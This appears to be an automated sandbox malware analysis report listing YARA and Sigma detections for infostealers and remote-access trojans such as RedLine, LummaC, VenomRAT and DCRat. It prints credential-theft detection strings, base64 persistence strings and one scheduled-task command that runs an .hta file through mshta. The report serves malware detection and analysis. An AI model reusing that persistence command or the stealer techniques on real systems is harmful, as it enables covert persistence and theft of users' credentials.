Process Memory Space: mshta.exe PID: 8076	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8144	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 6d81c0d08d.exe PID: 1160	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 6d81c0d08d.exe PID: 1160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6d81c0d08d.exe PID: 1160	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 6d81c0d08d.exe PID: 1160	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x30a40:$a4: get_ScannedWallets 0x434c9f:$a4: get_ScannedWallets 0x2f8e7:$a5: get_ScanTelegram 0x433b46:$a5: get_ScanTelegram 0x306c9:$a6: get_ScanGeckoBrowsersPaths 0x434928:$a6: get_ScanGeckoBrowsersPaths 0x2e57a:$a7: <Processes>k__BackingField 0x4327d9:$a7: <Processes>k__BackingField 0x2baad:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x42fd0c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2deae:$a9: <ScanFTP>k__BackingField 0x43210d:$a9: <ScanFTP>k__BackingField
Process Memory Space: 0a633717d1.exe PID: 2300	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0a633717d1.exe PID: 2300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0a633717d1.exe PID: 2300	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 376bb929a5.exe PID: 5776	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 376bb929a5.exe PID: 5776	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 376bb929a5.exe PID: 5776	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 327981c77b.exe PID: 5376	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 327981c77b.exe PID: 5376	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 1f8e467ee9.exe PID: 7216	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: 376bb929a5.exe PID: 7480	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 376bb929a5.exe PID: 7480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 376bb929a5.exe PID: 7480	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: mshta.exe PID: 6524	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7824	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 1240	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 327981c77b.exe PID: 5612	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 327981c77b.exe PID: 5612	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 53 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
58.2.82ab3472d6.exe.3469550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.6d81c0d08d.exe.d10000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.6d81c0d08d.exe.d10000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.2.6d81c0d08d.exe.d10000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x137ca:$a4: get_ScannedWallets 0x12628:$a5: get_ScanTelegram 0x1344e:$a6: get_ScanGeckoBrowsersPaths 0x1126a:$a7: <Processes>k__BackingField 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b9e:$a9: <ScanFTP>k__BackingField
21.2.6d81c0d08d.exe.d10000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x11bcb:$gen01: ChromeGetRoamingName 0x11bff:$gen02: ChromeGetLocalName 0x11c28:$gen03: get_UserDomainName 0x13e67:$gen04: get_encrypted_key 0x133e3:$gen05: browserPaths 0x1372b:$gen06: GetBrowsers 0x13061:$gen07: get_InstalledInputLanguages 0x1084f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9318:$spe6: windows-1251, CommandLine: 0x145bd:$spe9: wallet 0xf00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xf107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xf098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xf0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
21.2.6d81c0d08d.exe.d10000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1068a:$u7: RunPE 0x13d41:$u8: DownloadAndEx 0x9330:$pat14: , CommandLine: 0x13279:$v2_1: ListOfProcesses 0x1088b:$v2_2: get_ScanVPN 0x1092e:$v2_2: get_ScanFTP 0x1161e:$v2_2: get_ScanDiscord 0x1260c:$v2_2: get_ScanSteam 0x12628:$v2_2: get_ScanTelegram 0x126ce:$v2_2: get_ScanScreen 0x13416:$v2_2: get_ScanChromeBrowsersPaths 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths 0x13709:$v2_2: get_ScanBrowsers 0x137ca:$v2_2: get_ScannedWallets 0x137f0:$v2_2: get_ScanWallets 0x13810:$v2_3: GetArguments 0x11ed9:$v2_4: VerifyUpdate 0x167ea:$v2_4: VerifyUpdate 0x13bca:$v2_5: VerifyScanRequest 0x132c6:$v2_6: GetUpdates 0x167cb:$v2_6: GetUpdates
20.3.b7668220f8.exe.dc0000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
12.2.skotes.exe.de0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.skotes.exe.de0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.e70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
58.2.82ab3472d6.exe.3469550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
49.2.TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.e70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
54.2.48a23b3144.exe.3f09550.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x608a30:$x2: https://github.com/LimerBoy/StormKitty 0x608a4c:$x3: StormKitty
54.2.48a23b3144.exe.463c26a.1.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
54.2.48a23b3144.exe.463c26a.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
54.2.48a23b3144.exe.463c26a.1.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
54.2.48a23b3144.exe.463c26a.1.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
54.2.48a23b3144.exe.463c26a.1.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d703:$a1: havecamera 0x168528:$a2: timeout 3 > NUL 0x16b8ab:$a3: START "" " 0x16bdc0:$a3: START "" " 0x16bc9b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bd38:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
54.2.48a23b3144.exe.463c26a.1.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16ec22:$str01: Processe: 0x16eade:$str02: Compname: 0x16ebd8:$str04: SandBoxie: 0x16eb6e:$str08: WEBCAMS COUNT: 0x16eb92:$str09: [Virtualization] 0x16f3e0:$str10: [Open google maps]( 0x170e57:$str11: Remember password: 0x163f4c:$str12: Target.Browsers.Firefox 0x14b6c7:$str13: Modules.Keylogger 0x15358a:$str14: ClipperAddresses 0x15572f:$str15: ChromiumPswPaths 0x155741:$str15: ChromiumPswPaths 0x151684:$str16: DetectedBankingServices 0x1517ed:$str17: DetectCryptocurrencyServices 0x15f6e6:$str18: CheckRemoteDebuggerPresent 0x16066b:$str19: GetConnectedCamerasCount
54.2.48a23b3144.exe.463c26a.1.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ec4d:$str01: set_sUsername 0x13c17c:$str03: set_sExpMonth 0x151537:$str04: WritePasswords 0x151ff1:$str05: WriteCookies 0x155740:$str06: sChromiumPswPaths 0x15571b:$str07: sGeckoBrowserPaths 0x16adc5:$str10: encrypted_key":"(.*?)"
54.2.48a23b3144.exe.463c26a.1.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bd38:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167e08:$str04: Pac_ket 0x177b4e:$str05: Perfor_mance 0x177b92:$str06: Install_ed 0x122200:$str07: get_IsConnected 0x1386c2:$str08: get_ActivatePo_ng 0x14c5fd:$str09: isVM_by_wim_temper 0x178440:$str10: save_Plugin 0x168528:$str11: timeout 3 > NUL 0x17772e:$str12: ProcessHacker.exe 0x177920:$str13: Select * from Win32_CacheMemory
54.2.48a23b3144.exe.463c26a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bd38:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc9b:$s2: L2Mgc2NodGFza3MgL2
54.2.48a23b3144.exe.463c26a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x177920:$q1: Select * from Win32_CacheMemory 0x177960:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x1779ae:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x1779fc:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
54.2.48a23b3144.exe.463c26a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fafc:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
54.2.48a23b3144.exe.463c26a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175497:$s1: \VPN\NordVPN 0x17547d:$s2: \VPN\OpenVPN 0x17545f:$s3: \VPN\ProtonVPN
54.2.48a23b3144.exe.463c26a.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a1e1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a253:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a2dd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a36f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a3d9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a44b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a4e1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a571:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
54.2.48a23b3144.exe.463c26a.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d98:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163f0e:$s6: VirtualBox 0x173a8b:$s6: VirtualBox 0x16f4a8:$s8: Win32_ComputerSystem 0x1739f1:$s8: Win32_ComputerSystem 0x16c5d4:$s9: Win32_Process Where ParentProcessID= 0x16c1f1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c28e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c3a3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c48b:$cnc4: POST / HTTP/1.1
54.0.48a23b3144.exe.5e0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
54.2.48a23b3144.exe.4518570.2.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
54.2.48a23b3144.exe.4518570.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
54.2.48a23b3144.exe.4518570.2.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
54.2.48a23b3144.exe.4518570.2.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
54.2.48a23b3144.exe.4518570.2.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x23f5fd:$a1: havecamera 0x28a422:$a2: timeout 3 > NUL 0x28d7a5:$a3: START "" " 0x28dcba:$a3: START "" " 0x28db95:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28dc32:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
54.2.48a23b3144.exe.4518570.2.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x290b1c:$str01: Processe: 0x2909d8:$str02: Compname: 0x290ad2:$str04: SandBoxie: 0x290a68:$str08: WEBCAMS COUNT: 0x290a8c:$str09: [Virtualization] 0x2912da:$str10: [Open google maps]( 0x292d51:$str11: Remember password: 0x285e46:$str12: Target.Browsers.Firefox 0x26d5c1:$str13: Modules.Keylogger 0x275484:$str14: ClipperAddresses 0x277629:$str15: ChromiumPswPaths 0x27763b:$str15: ChromiumPswPaths 0x27357e:$str16: DetectedBankingServices 0x2736e7:$str17: DetectCryptocurrencyServices 0x2815e0:$str18: CheckRemoteDebuggerPresent 0x282565:$str19: GetConnectedCamerasCount
54.2.48a23b3144.exe.4518570.2.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x250b47:$str01: set_sUsername 0x25e076:$str03: set_sExpMonth 0x273431:$str04: WritePasswords 0x273eeb:$str05: WriteCookies 0x27763a:$str06: sChromiumPswPaths 0x277615:$str07: sGeckoBrowserPaths 0x28ccbf:$str10: encrypted_key":"(.*?)"
54.2.48a23b3144.exe.4518570.2.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28dc32:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x289d02:$str04: Pac_ket 0x299a48:$str05: Perfor_mance 0x299a8c:$str06: Install_ed 0x2440fa:$str07: get_IsConnected 0x25a5bc:$str08: get_ActivatePo_ng 0x26e4f7:$str09: isVM_by_wim_temper 0x29a33a:$str10: save_Plugin 0x28a422:$str11: timeout 3 > NUL 0x299628:$str12: ProcessHacker.exe 0x29981a:$str13: Select * from Win32_CacheMemory
54.2.48a23b3144.exe.4518570.2.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28dc32:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28db95:$s2: L2Mgc2NodGFza3MgL2
54.2.48a23b3144.exe.4518570.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29981a:$q1: Select * from Win32_CacheMemory 0x29985a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x2998a8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x2998f6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
54.2.48a23b3144.exe.4518570.2.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2919f6:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
54.2.48a23b3144.exe.4518570.2.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x297391:$s1: \VPN\NordVPN 0x297377:$s2: \VPN\OpenVPN 0x297359:$s3: \VPN\ProtonVPN
54.2.48a23b3144.exe.4518570.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28c0db:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28c14d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28c1d7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28c269:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28c2d3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28c345:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28c3db:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28c46b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
54.2.48a23b3144.exe.4518570.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x289c92:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x285e08:$s6: VirtualBox 0x295985:$s6: VirtualBox 0x2913a2:$s8: Win32_ComputerSystem 0x2958eb:$s8: Win32_ComputerSystem 0x28e4ce:$s9: Win32_Process Where ParentProcessID= 0x28e0eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28e188:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28e29d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28e385:$cnc4: POST / HTTP/1.1
54.2.48a23b3144.exe.4518570.2.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
54.2.48a23b3144.exe.4518570.2.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
54.2.48a23b3144.exe.4518570.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
54.2.48a23b3144.exe.4518570.2.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
54.2.48a23b3144.exe.4518570.2.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
54.2.48a23b3144.exe.4518570.2.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x2413fd:$a1: havecamera 0x28c222:$a2: timeout 3 > NUL 0x28f5a5:$a3: START "" " 0x28faba:$a3: START "" " 0x28f995:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28fa32:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
54.2.48a23b3144.exe.4518570.2.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x29291c:$str01: Processe: 0x2927d8:$str02: Compname: 0x2928d2:$str04: SandBoxie: 0x292868:$str08: WEBCAMS COUNT: 0x29288c:$str09: [Virtualization] 0x2930da:$str10: [Open google maps]( 0x294b51:$str11: Remember password: 0x287c46:$str12: Target.Browsers.Firefox 0x26f3c1:$str13: Modules.Keylogger 0x277284:$str14: ClipperAddresses 0x279429:$str15: ChromiumPswPaths 0x27943b:$str15: ChromiumPswPaths 0x27537e:$str16: DetectedBankingServices 0x2754e7:$str17: DetectCryptocurrencyServices 0x2833e0:$str18: CheckRemoteDebuggerPresent 0x284365:$str19: GetConnectedCamerasCount
54.2.48a23b3144.exe.4518570.2.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x623:$sk01: LimerBoy/StormKitty 0x252947:$str01: set_sUsername 0x25fe76:$str03: set_sExpMonth 0x275231:$str04: WritePasswords 0x275ceb:$str05: WriteCookies 0x27943a:$str06: sChromiumPswPaths 0x279415:$str07: sGeckoBrowserPaths 0x28eabf:$str10: encrypted_key":"(.*?)"
54.2.48a23b3144.exe.4518570.2.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28fa32:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x28bb02:$str04: Pac_ket 0x29b848:$str05: Perfor_mance 0x29b88c:$str06: Install_ed 0x245efa:$str07: get_IsConnected 0x25c3bc:$str08: get_ActivatePo_ng 0x2702f7:$str09: isVM_by_wim_temper 0x29c13a:$str10: save_Plugin 0x28c222:$str11: timeout 3 > NUL 0x29b428:$str12: ProcessHacker.exe 0x29b61a:$str13: Select * from Win32_CacheMemory
54.2.48a23b3144.exe.4518570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28fa32:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28f995:$s2: L2Mgc2NodGFza3MgL2
54.2.48a23b3144.exe.4518570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29b61a:$q1: Select * from Win32_CacheMemory 0x29b65a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x29b6a8:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x29b6f6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
54.2.48a23b3144.exe.4518570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2937f6:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
54.2.48a23b3144.exe.4518570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x299191:$s1: \VPN\NordVPN 0x299177:$s2: \VPN\OpenVPN 0x299159:$s3: \VPN\ProtonVPN
54.2.48a23b3144.exe.4518570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28dedb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28df4d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28dfd7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28e069:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28e0d3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28e145:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28e1db:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28e26b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
54.2.48a23b3144.exe.4518570.2.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x610:$x2: https://github.com/LimerBoy/StormKitty 0x62c:$x3: StormKitty 0x27dfe6:$s2: GetAntivirus 0x29404a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28d495:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28eabd:$s6: "encrypted_key":"(.*?)"
54.2.48a23b3144.exe.4518570.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28ba92:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287c08:$s6: VirtualBox 0x297785:$s6: VirtualBox 0x2931a2:$s8: Win32_ComputerSystem 0x2976eb:$s8: Win32_ComputerSystem 0x2902ce:$s9: Win32_Process Where ParentProcessID= 0x28feeb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ff88:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x29009d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290185:$cnc4: POST / HTTP/1.1
Click to see the 54 entries

Other

Source	Rule	Description	Author
amsi32_7900.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_8144.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_7824.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6104.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 7720, ParentProcessName: random.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7740, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

